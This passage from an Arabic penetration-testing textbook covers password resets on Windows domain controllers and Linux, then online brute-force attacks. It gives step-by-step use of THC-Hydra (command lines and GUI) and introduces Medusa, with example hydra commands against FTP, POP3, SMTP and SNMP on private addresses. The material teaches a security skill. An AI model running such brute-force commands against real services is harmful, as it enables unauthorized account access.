‫وﺗﺳﺟﯾل اﻟدﺧول ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻌدﻟﺔ او اﻟﻣﻛﺳورة‪ .‬ﺑﻣﺟرد ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﯾﺗم ﺗﺛﺑﯾت ﺧدﻣﺔ اﻟﺗﻲ ﺗﻧﻔذ اﻷﻣر ‪) net user‬ﻣﻊ اﻣﺗﯾﺎزات‬
‫‪ .(SYSTEM‬وﺑﻣﺟرد إﻋﺎدة ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﻓﺎن ﯾﺳﻣﺢ ﺑﺗﺣﻣﯾل ‪ ،Active Directory‬وھﻧﺎ ﺗﻘوم اﻟﺧدﻣﺔ ﺑﺈﺿﺎﻓﺔ او ﺗﻌدﯾل‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺳﻣﺢ ﻟك ﺑﺎﻟدﺧول ﺑﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﻐﯾرھﺎ‪ .‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.nobodix.org/seb/win2003_adminpass.html‬‬
‫‪Resetting Linux Systems‬‬

‫ﻓﻲ ﻟﯾﻧﻛس‪ ،‬ﯾﺗم اﺳﺗﺧدام ﺗﻘﻧﯾﺔ ﻣﻣﺎﺛﻠﺔ ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت اﻟﻣرور ‪ .root‬ﯾﺗم إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز إﻣﺎ ﻓﻲ ‪ single mode‬أو ﺗﺷﻐﯾل ﻣن ﻧظﺎم‬
‫ﺗﺷﻐﯾل آﺧر‪ .‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ھذا ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://linuxgazette.net/107/tomar.html‬‬

‫اﻻن وﻗد ﺳردﻧﺎ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت اﻟﻣﻌﺗﻣدة ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش اﻟﺧﺎص ﺑﻛﻠﻣﺔ اﻟﻣرور ﻟﻛﺳرھﺎ واﻻن ﻧﻧﺗﻘل اﻟﻰ ﺟزء اﺧر واﻟذي ﯾﺿم‬
‫اﻟﻌدﯾد ﻣن اﻷدوات وھو ‪.Online Password Attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪365‬‬

‫‪Online Password Attack: Gaining Access to Remote Services‬‬

‫ﻋﻧد اﺳﺗﻌراض ﻧﺎﺗﺞ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ )‪ ،(Footprinting‬ﻓﯾﺟب ﻋﻠﯾك داﺋﻣﺎ وﺿﻊ ﻣﻼﺣظﺎت ﺧﺎﺻﺔ ﻋن ﺑروﺗوﻛول اﻹﻧﺗرﻧت )‪ (IP‬ﻟﻠﻌﻧﺎوﯾن‬
‫اﻟﺗﻲ ﺗﺗﺿﻣن ﻧوع ﻣن ﺧدﻣﺔ اﻟوﺻول ﻋن ﺑﻌد‪ .‬ﻣﺛل)‪ ، (FTP)،Telnet ، (SSH‬ﺑرﻧﺎﻣﺞ‪ ،VNC ، PCAnywhere‬وﺑروﺗوﻛول ﺳطﺢ‬
‫اﻟﻣﻛﺗب اﻟﺑﻌﯾد )‪ (remote desktop protocol‬ھﻲ اﻟﺧﯾﺎرات اﻷﻛﺛر ﺷﻌﺑﯾﺔ ﻷن اﻟوﺻول إﻟﻰ ھذه اﻟﺧدﻣﺎت ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﯾؤدي إﻟﻰ‬
‫اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻟﺟﮭﺎز اﻟﮭدف‪ .‬ﻋﻧد اﻛﺗﺷﺎف واﺣدة ﻣن ھذه اﻟﺧدﻣﺎت‪ ،‬ﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﺗﺗﺣول ﻋﺎدة إﻟﻰ "‪.“ Online Password Attack‬‬
‫وﻟﻐرض ھذا اﻟﻛﺗﺎب‪ ،‬ﻓﺳوف ﻧﻘوم ﺑﺗﻌرﯾف " ‪ " Online Password Attack‬ﻋﻠﻰ أﻧﮫ ﺗﻘﻧﯾﺔ ھﺟوم واﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ ﺧدﻣﮫ ﺗﻌﻣل اﻻن‬
‫"‪ "live service‬ﻣﺛل ‪ SSH‬أو ‪ Online Password Attack .Telnet‬ﺗﻌﻣل ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ ‪ brute force Attack‬ﻹﯾﺟﺎد‬
‫طرﯾﻘﮫ إﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻗﺎﺋﻣﺔ ﺷﺎﻣﻠﺔ ﻟﻛﻠﻣﺎت اﻟﺳر وأﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو ﺗرﻛﯾﺑﺎت‪ .‬ﻓﻲ اﻟﻣﻘﺎﺑل‪ ،‬ﺣﺎﻟﯾﺎ ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺔ‬
‫اﻟﻣرور )‪ (Offline Password Attack‬ﻻ ﺗﺗطﻠب ان ﺗﻛزن اﻟﺧدﻣﺔ ﻗﯾد اﻟﺗﺷﻐﯾل‪.‬‬
‫ﻋﻧد اﺳﺗﺧدام ‪ ،Online Password Cracker‬ﻓﺎن إﻣﻛﺎﻧﯾﺔ اﻟﻧﺟﺎح ﯾﻣﻛن ان ﺗزﯾد ﺑﻧﺳﺑﮫ ﻛﺑﯾره إذا ﻗﻣت ﺑﺿم ھذا اﻟﮭﺟوم ﻣﻊ اﻟﻣرﺣﻠﺔ‬
‫اﻷوﻟﻰ واﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺧطوة ‪ .1‬ﻋﻠﻰ وﺟﮫ اﻟﺗﺣدﯾد ﯾﺟب أن ﺗﺗﺄﻛد ﻣن أﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو‬
‫ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﻛﺗﺷﻔت‪ .‬ﻋﻣﻠﯾﺔ ﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻹﻧﺗرﻧت )‪ (Online Password Cracker‬ﺗﺗطﻠب ﺣرﻓﯾﺎ ﺑراﻣﺞ اﻟﮭﺟوم‬
‫ﻹرﺳﺎل اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ ﻣرور ﻟﻠﮭدف‪ .‬ﻓﺈذا ﻛﺎن إﻣﺎ اﺳم اﻟﻣﺳﺗﺧدم أو ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﺻﺣﯾﺣﺔ‪ ،‬ﺳﯾﺗم ﻋرض رﺳﺎﻟﺔ ﺧطﺎ ﻣن ﻗﺑل ﺑرﻧﺎﻣﺞ‬
‫اﻟﮭﺟوم وﺳﺗﻔﺷل ﺗﺳﺟﯾل اﻟدﺧول‪ .‬ﺛم ﺑﻌد ذﻟك ﯾﻘوم ﺑﺎرﺳﺎل ﺗرﻛﯾﺑﺔ ﻣن اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﺎﻟﯾﺔ‪ .‬وﺗﺳﺗﻣر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﻧﺟﺢ‬
‫اﻟﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻌﺛور ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول‪/‬ﻛﻠﻣﺔ ﻣرور اﻟﺻﺣﯾﺣﺔ أو أﻧﮫ ﯾﻧﮭﻰ ﻛل اﻟﺗﺧﻣﯾﻧﺎت ﺑدون إﯾﺟﺎد ﺷﻲء‪ .‬ﻋﻠﻰ اﻟﻌﻣوم‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻣن أن‬
‫أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻣﮭﯾﺋﮫ ﻟﻣﺛل ھذه ﻣن اﻟﻣﮭﺎم اﻟﻣﺗﻛررة‪ ،‬وﻟﻛن ھذه اﻟﻌﻣﻠﯾﺔ ﺑطﯾﺋﺔ ﻧوﻋﺎ ﻣﺎ‪.‬‬
‫ﻓﻲ ھذه اﻟﺟزء ﺳوف ﻧﺳﺗﺧدم )‪ .THC-Hydra password cracker (Hydra‬ھﻧﺎك أوﻗﺎت اﻟﺗﻲ ﺳﯾﻛون ﻟدﯾﻧﺎ اﻟوﻗت ﻟﻣﮭﺎﺟﻣﺔ ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﯾﻌﻣل ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows‬ﻣﺑﺎﺷرة )‪ (physical attack‬واﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻠف )‪ (SAM‬ﻣﺑﺎﺷرة‪ .‬وﻣﻊ ذﻟك‪ ،‬ﺳوف ﯾﻛون‬
‫ھﻧﺎك أﯾﺿﺎ اﻟوﻗت اﻟذي ﻧﺣن ﻧﻛون ﻓﯾﮫ ﻏﯾر ﻗﺎدرﯾن ﻋﻠﻰ اﻟﻘﯾﺎم ﺑذﻟك‪ ،‬وھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺛﺑت ﻓﯾﮫ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‬
‫)‪ (Online Password Attack‬اﻷﻛﺛر ﻓﺎﺋدة‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم ﺑﺄن ﺑﻌض اﻟﻧظم اﻟوﺻول ﻋن ﺑﻌد ﺗوظف ﺗﻘﻧﯾﺔ اﺧﺗﻧﺎق ﻛﻠﻣﺔ اﻟﻣرور )‪ (password throttling‬واﻟﺗﻲ‬
‫ﯾﻣﻛن أن ﺗﺣد ﻋدد ﻣرات ﺗﺳﺟﯾل اﻟدﺧول اﻟﻔﺎﺷﻠﺔ اﻟﻣﺳﻣوح ﺑﮭﺎ ﻟك‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﯾﻣﻛن أن ﯾﺗم ﺣظر ﻋﻧوان ‪ IP‬اﻟﺧﺎص ﺑك أو ﯾﺗم ﻏﻠﻖ‬
‫اﺳم اﻟﻣﺳﺗﺧدم‪.‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت)‪ . (Online Password Cracker‬اﺛﻧﯾن ﻣن اﻷدوات‬
‫اﻷﻛﺛر ﺷﻌﺑﯾﺔ ھﻲ ﻣﯾدوﺳﺎ )‪(Medusa‬وھﯾدرا)‪ .(Hydra‬ھذه اﻷدوات ﻣﺗﺷﺎﺑﮭﺔ ﺟدا ﻓﻲ طﺑﯾﻌﺔ ﻋﻣﻠﮭﺎ‪.‬‬
‫أي ﺧدﻣﺔ )‪(service‬ﻣوﺟودة ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺗطﻠب ﻣن اﻟﻣﺳﺗﺧدم ﺗﺳﺟﯾل اﻟدﺧول ھﻲ ﻋرﺿﺔ ﻟﮭﺟوم اﻟﺗﺧﻣﯾن)‪. (password guessing‬‬
‫وﺗﺷﻣل ﺧدﻣﺎت اﻟﺷﺑﻛﺔ ﻣﺛل ‪ ،SQL ،IM ،LDAP ،TELNET ،SSH ،RDP ،SMB ،VNC ،IMAP ،POP3 ،HTTP‬وأﻛﺛر‬
‫ﻣن ذﻟك‪ .‬ھﺟوم ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر اﻹﻧﺗرﻧت )‪ (Online Password Attack‬ﯾﻧطوي ﻋﻠﻰ إﺗﻣﺎم ﻋﻣﻠﯾﺔ اﻟﺗﺧﻣﯾن ﻣن أﺟل ﺗﺳرﯾﻊ اﻟﮭﺟوم‬
‫وﺗﺣﺳﯾن ﻓرص اﻟﺗﺧﻣﯾن اﻟﻧﺎﺟﺣﺔ‪.‬‬

‫)‪THC-Hydra Password Cracker (Hydra‬‬

‫اﻟﻣﺻدر‪http://www.thc.org :‬‬
‫رﻗم واﺣد ﻓﻲ أﻛﺑر اﻟﺛﻐرات اﻷﻣﻧﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﻛﻣﺎ ﯾظﮭر ﻓﻲ ﻛل دراﺳﺔ ﺣول أﻣﺎن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪366‬‬

‫‪ Hydra‬ھﻲ أداه ﺗم ﺗطوﯾرھﺎ ﻣن ﻗﺑل )‪ The Hacker's Choice (THC‬واﻟﺗﻲ ﺗﺳﺗﺧدم أﺳﻠوب ھﺟوم ‪ brute force‬ﻟﻼﺧﺗﺑﺎر ﺿد‬
‫ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ھﻲ اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻣﮭﺎﺟﻣﺔ أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﺣﯾث ان ‪ Hydra‬ﯾﻣﻛﻧﮭﺎ اﺳﺗﮭداف ‪IP‬‬
‫وﺑروﺗوﻛول ﻣﺣددة ﻣﺛل ﺣﺳﺎب اﻟﻣﺷرف ل ‪ POP3‬و ‪SMTP‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪.‬‬
‫ﺗم اﺧﺗﺑﺎر ‪ Hydra‬ﻟﻛﻲ ﺗﻌﻣل ﺟﯾدا ﻋﻠﻰ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ‪ FreeBSD 8.1 ،Solaris 11 ،Windows/Cygwin ،Linux‬و‪.OSX‬‬
‫‪ Hydra‬ﺗدﻋم اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل اﻻﺗﻲ‪:‬‬

‫ﯾﺗﺿﻣن ھﯾدرا دﻋم ‪ SSL‬وﺟزء ﻣن ‪ .Nessus‬ھﯾدرا ﯾدﻋم ﻋدد ﻛﺑﯾر ﻣن اﻟﺑروﺗوﻛوﻻت واﻟﺗﻲ ﺗﻌرف ب‪. password brute force tool‬‬
‫ﻟﻛن ﯾﺟب ان ﺗﻛون ﻋﻠﻰ ﺣذر ﻋﻠﻰ اﻟرﻏم ﻣن ذﻟك‪ ،‬ﻷن ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﻛون ﺻﺎﺧﺑﺎ ﺑﻌض اﻟﺷﻲء‪ ،‬ﻣﻣﺎ ﯾزﯾد ﻣن ﻓرﺻﺔ‬
‫اﻟﻛﺷف ﻋﻧك‪ .‬ھذه اﻷداة ھو دﻟﯾل ﻣن اﻟﺗﻌﻠﯾﻣﺎت اﻟﺑرﻣﺟﯾﺔ اﻟﻣﻔﮭوﻣﺔ‪ ،‬وذﻟك ﻹﻋطﺎء اﻟﺑﺎﺣﺛﯾن واﺳﺗﺷﺎري اﻷﻣن اﻣﻛﺎﻧﯾﺔ اظﮭﺎر ﻛﯾف أﻧﮫ ﺳﯾﻛون‬
‫ﻣن اﻟﺳﮭل اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻣن ﺑﻌﯾد إﻟﻰ اﻟﻧظﺎم‪.‬‬
‫ﻗﺑل إطﻼق ھﯾدرا‪ ،‬ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﮭدف ﻣﺛل ﻧظﺎم اﻟﺑرﯾد ﻛﻣﺎ ﺗم ﺷرﺣﮫ ﻓﻲ اﻟﻔﺻول اﻟﺳﺎﺑﻘﺔ‪ .‬ﻣﺛل اﻷداة ‪.nmap‬‬
‫ﻟﻠوﺻول اﻟﻰ ھﯾدرا ﻣن ﻛﺎﻟﻲ‪ ،‬ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ أدوات ﻛﺎﻟﻲ ﻧﻧﺗﻘل إﻟﻰ‬
‫‪Password Attacks | Online Attacks | Hydra‬‬
‫وھذا ﺳوف ﯾﻔﺗﺢ ﻟك ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺳوف ﺗﻘوم ﺑﺗﺷﻐﯾل ھﯾدرا‪.‬‬

‫ﺗوﺿﺢ اﻟوﺛﺎﺋﻖ ﻛﯾﻔﯾﺔ ﺗﺷﻐﯾل ھﯾدرا‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﻧت ﺗرﯾد أن ﺗﮭﺎﺟم ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب ﻣﺷرف اﻟذي ﯾﻘﻊ ﻓﻲ‬
‫‪ 192.168.1.1‬ﺑﺎﺳﺗﺧدام‪ ، SMTP‬ﺳﺗﻛﺗب اﻻﺗﻲ‪:‬‬
‫‪#hydra -l admin -p /root/password.txt 192.168.1.1 smtp‬‬
‫اﻟﺗﻌﺑﯾر ‪ –P‬ﯾﺷﯾر اﻟﻰ اﻟﻣﺳﺎر اﻟذي ﯾوﺟد ﺑﮫ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺳوف ﯾﺳﺗﺧدﻣﮭﺎ‪ ،‬و ‪ –L‬ﯾﺷﯾر اﻟﻰ ﻗﺎﺋﻣﺔ أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫ﻟﻠﮭﯾدرا أﯾﺿﺎ واﺟﮭﮫ رﺳوﻣﯾﮫ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ إذا ﻛﻧت ﺗﻔﺿل اﺳﺗﺧدام اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﺳواء ﻓﻲ ﻟﯾﻧﻛس او وﯾﻧدوز‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪367‬‬

‫ﻟﻠوﺻول اﻟﻰ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ‪ hydra-gtk‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬
‫‪Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk‬‬
‫ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫اﻵن ﺑﻌد أن ﺑدأﻧﺎ ﻣﻊ ھﯾدرا‪ ،‬ﻓﻧﺣن ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﻌﯾﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت )‪ .(Word list‬ﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ .Passwords‬ﺳوف‬
‫ﻧﺳﺗﺧدم ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﺗم ذﻟك ﺑﺈدﺧﺎل اﺳم اﻟﻣوﻗﻊ ﻟﻘﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬وﻧﺧﺗﺎر‬
‫أﯾﺿﺎ ‪ Loop around users‬و‪.Try empty password‬‬
‫ھﻧﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳوف ﻧﺧﺗﺎر اﻟﻘواﺋم اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪Username List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt‬‬
‫‪Password List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/passwds/john.txt‬‬

‫اﻟﺧطوة اﻟﻣﻘﺑﻠﺔ‪ ،‬ﺳوف ﻧﻘوم ﺑﺗﺣدﯾد طﺑﯾﻌﺔ اﻟﮭﺟوم وﯾﺗم ذﻟك ﺑﺎﻟﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ .Tuning‬ﺗﺣت اﻟﺧﯾﺎر ‪،Performance Options‬‬
‫ﻧﻘوم ﺑوﺿﻊ ﻋدد اﻟﻣﮭﺎم )‪ (Number of tasks‬ﻣن ‪ 16‬اﻟﻰ ‪ .2‬واﻟﺳﺑب ﻓﻲ ذﻟك ھو أﻧﻧﺎ ﻻ ﻧرﯾد ھذا اﻟﻌدد اﻟﻛﺑﯾر ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ واﻟﺗﻲ‬
‫ﻣن اﻟﻣﻣﻛن ان ﺗﺳﻘط اﻟﺧﺎدم‪ .‬ﻧﺣن ﻧرﯾد أﯾﺿﺎ أن ﺗﻌﯾﯾن اﻟﺧﯾﺎر ‪ Exit after first found pair‬وھذا اﺧﺗﯾﺎري ﻋﻠﻰ ﺣﺳب اﻟرﻏﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪368‬‬

‫اﻣﺎ اﻟﺟزء اﻟﺛﺎﻧﻲ اﻟﻣوﺟود ﺗﺣت اﻟﺧﯾﺎر ‪ Use a HTTP/HTTPS Proxy‬ﻓﮭو اﻟﻣﺳﺋول ﻋن إﻋدادت اﻟﺑروﻛﺳﻲ‪.‬‬

‫أﺧﯾرا‪ ،‬ﺳوف ﻧذھب ﺑﻌد اﻟﻰ ھدﻓﻧﺎ‪ .‬ﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ Target‬وﻧﺣدد ھدﻓﻧﺎ واﻟﺑروﺗوﻛول اﻟذي ﻧود أن ﻧﮭﺎﺟﻣﮫ‪.‬‬

‫وأﺧﯾرا‪ ،‬ﻓﺈﻧﻧﺎ ﻧﻘوم ﺑﺗﻧﻔﯾذ ‪ exploit‬ﻣن ﺧﻼل اﻟﻧﻘر ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ Start‬واﻟﺿﻐط ﻋﻠﻰ زر اﻟﺑدء ‪.Start‬‬
‫وﻋﻧد إﯾﺟﺎد ﻧﺗﯾﺟﺔ ﺳوف ﺗظﮭر ﻣﺛل اﻟﺷﻛل اﻻﺗﻲ‪:‬‬

‫ﻣن ﺧﻼل ﺷﺎﺷﮫ ‪ target‬ﯾﻣﻛﻧك ادﺧﺎل اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


369

:‫ﻓﻲ ﯾﻠﻲ ﺑﻌض اﻷﻣﺛﻠﺔ ﻻﺳﺗﺧدام اﻟﮭﯾدرا ﻣﻊ اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‬
#hydra -l ftp -P passwords.txt -v 192.168.0.112 ftp
#hydra -l muts -P passwords.txt -v 192.168.0.112 pop3
#hydra -P passwords.txt -v 192.168.0.112 snmp

Medusa: Gaining Access to Remote Services


‫ اﻟﻣﯾدوﺳﺎ ﻗﺎدره‬.‫ واﻟذي ﯾﺣﺎول اﻟوﺻول إﻟﻰ ﺧدﻣﺎت اﻟﺗوﺛﯾﻖ ﻋن ﺑﻌد‬brute forcer ‫ﺗم وﺻف اﻟﻣﯾدوﺳﺎ ﻋﻠﻰ اﻧﮫ ﺗﺳﺟﯾل دﺧول ﻣوازي ﺑﺎل‬
Microsoft SQL ‫ و‬IMAP ،HTTP ،FTP ،Apple filing protocol ‫ﻋﻠﻰ اﻟﻣﺻﺎدﻗﺔ ﻣﻊ ﻋدد ﻛﺑﯾر ﻣن اﻟﺧدﻣﺎت ﻋن ﺑﻌد ﺑﻣﺎ ﻓﻲ ذﻟك‬
،POP3 ،PCAnywhere ‫ وﺑرﻧﺎﻣﺞ‬،network news transfer(NNTP) ،NetWare core protocol(NCP) ،MySQL‫و‬
،VNC ،Telnet‫و‬SSHv2 ،simple mail transfer protocol authentication(SMB) ،RLOGIN ،REXEC
.‫ وأﻛﺛر ﻣن ذﻟك‬، (Web forms)‫ ﻧﻣﺎذج اﻟوﯾب‬،simple network management protocol(SNMP)
.[medusa –d] ‫– ﻛﺎﻻﺗﻰ‬d ‫وﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻟﺑروﺗوﻛوﻻت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل اﺳﺗﺧدام اﻟﺗﻌﺑﯾر‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪370‬‬

‫ﯾﻣﻛن أﯾﺿﺎ اﻟوﺻول اﻟﻰ ‪ Medusa‬ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬


‫‪Applications | Kali Linux | Password Attacks | Online Attacks | medusa.‬‬

‫ﻣن أﺟل اﺳﺗﺧدام ﻣﯾدوﺳﺎ‪ ،‬ﺗﺣﺗﺎج اﻟﻰ ﻋدة ﻗطﻊ ﻣن اﻟﻣﻌﻠوﻣﺎت ﺑﻣﺎ ﻓﻲ ذﻟك ﻋﻧوان ‪ IP‬اﻟﮭدف‪ ،‬اﺳم ﻣﺳﺗﺧدم أو ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم اﻟﺗﻲ ﺗﺣﺎول‬
‫اﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﺗﺳﺟﯾل اﻟدﺧول وﻛﻠﻣﺔ ﻣرور أو ﻣﻠف اﻟﻘﺎﻣوس اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻧد ﺗﺳﺟﯾل اﻟدﺧول‪،‬‬
‫واﺳم اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﺣﺎول اﻟﻣﺻﺎدﻗﺔ ﻣﻌﮭﺎ وھذا ﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ اﻟﮭﯾدرا‪.‬‬

‫واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس)‪ . (Dictionary list‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن اﻧﺷﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‪،‬‬
‫ﻓﻌﻠﯾك أن ﺗﻘرر إذا ﻛﻧت ﺗﺳﯾر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم ﻣﺳﺗﺧدم واﺣد أو إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺗوﻓﯾر ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن‪.‬‬
